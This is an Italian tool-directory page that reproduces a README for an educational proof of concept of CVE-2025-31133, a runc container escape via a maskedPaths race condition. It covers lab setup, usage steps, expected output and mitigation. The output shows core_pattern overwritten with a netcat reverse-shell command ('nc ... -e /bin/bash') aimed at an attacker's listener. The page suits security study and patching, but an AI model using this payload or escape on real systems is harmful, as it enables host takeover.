Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Learn-about-cve-2025-31133-poc — Dimostrazione didattica per CVE-2025-31133, un container escape di runc tramite condizione di gara su maskedPaths. Include configurazione del laboratorio, script di exploit e guida alla mitigazione per ricercatori di sicurezza. | Kitploit
Strumenti/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitApprendimento e FormazioneEscape dal ContainerLab e Pratica
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

Dimostrazione didattica per CVE-2025-31133, un container escape di runc tramite condizione di gara su maskedPaths. Include configurazione del laboratorio, script di exploit e guida alla mitigazione per ricercatori di sicurezza.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
234 mesi faNon ancora revisionato

Learn-about-cve-2025-31133-poc

Panoramica

Una dimostrazione proof-of-concept e un ambiente di apprendimento per CVE-2025-31133, una vulnerabilità di sicurezza in runc che consente di bypassare la protezione maskedPaths attraverso una race condition. maskedPaths sono progettati per impedire ai container di accedere a percorsi sensibili del filesystem host.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 Questo repository è un esempio pratico della mentalità e delle tecniche di ricerca insegnate nel training Black Hat:

Se trovi interessante questo, è solo la punta dell'iceberg.

Offensive Container Security: Una Masterclass per Infrangere i Confini

📅 Date del Training Black Hat USA 2026:

1–2 Agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3–4 Agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-31133
  • Componente: runc (container runtime)
  • Vettore di attacco: Race condition nella gestione di maskedPaths
  • Impatto: Container escape

Come Funziona

L'exploit sfrutta una race condition in cui:

  1. Un container è configurato con maskedPaths per proteggere file sensibili (es. /proc/sys/kernel/core_pattern)
  2. Durante l'inizializzazione del container, si verifica una race condition tra:
    • La cancellazione di un device node (/dev/null) nel rootfs del container
    • La ricreazione di quel device node
  3. Questa finestra temporale consente di bypassare la protezione dei percorsi mascherati
  4. Un attaccante può scrivere su file protetti che dovrebbero essere mascherati

⚠️ Disclaimer

Questo repository è solo a scopo educativo.

  • Utilizzare solo in ambienti isolati e controllati
  • Non utilizzare contro sistemi di cui non si è proprietari o per i quali non si ha esplicita autorizzazione al test
  • L'autore non è responsabile per qualsiasi uso improprio di questo codice
  • Questo exploit può causare instabilità del sistema o perdita di dati

Prerequisiti

  • Sistema Linux (consigliato Ubuntu)
  • Accesso root/sudo
  • Connessione Internet
  • Comprensione di base dei container runtime e della sicurezza

Configurazione

1. Clona o Scarica Questo Repository

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. Esegui lo Script di Setup del Laboratorio

Lo script lab-setup.sh eseguirà:

  • Installare le dipendenze
  • Impostare una versione vulnerabile di runc v1.2.0
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. Verifica la Configurazione

Verifica che la versione vulnerabile di runc sia installata:

root@kitploit:~
runc --version

Dovresti vedere la versione 1.2.0 o simile.

Esecuzione dell'Exploit

Utilizzo di Base

  1. Avvia un listener sulla tua macchina attaccante per ricevere la reverse shell:
root@kitploit:~
nc -lnvp <PORT>
  1. Esegui lo script dell'exploit:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. Fornisci le informazioni richieste quando richiesto:
    • Indirizzo IP dell'attaccante
    • Porta dell'attaccante (dove è in esecuzione il tuo listener)

Output Previsto

In caso di successo, dovresti vedere:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

Una connessione reverse shell dovrebbe essere stabilita al tuo listener.

Mitigazione

Per proteggersi da questa vulnerabilità:

  1. Aggiorna runc a una versione patchata (v1.2.1 o successiva)
  2. Mantieni aggiornati i container runtime regolarmente
  3. Usa il principio del minimo privilegio - esegui i container in un namespace utente non-root

Riferimenti

  • mailing archive
  • vuln poc GitHub Repository

Note

  • L'exploit potrebbe richiedere più tentativi per riuscire a causa della natura della race condition
  • Il tasso di successo dipende dal carico del sistema e dal tempismo
  • Lo script ripristina automaticamente il core_pattern originale dopo un exploit riuscito
  • La pulizia viene gestita automaticamente tramite gestori trap

Licenza

Questo progetto è fornito a scopo educativo. Utilizzare in modo responsabile ed etico.


Ricorda: Utilizza sempre gli strumenti di sicurezza informatica in modo responsabile e solo in ambienti di tua proprietà o per i quali hai esplicita autorizzazione al test.

Scarica lo strumento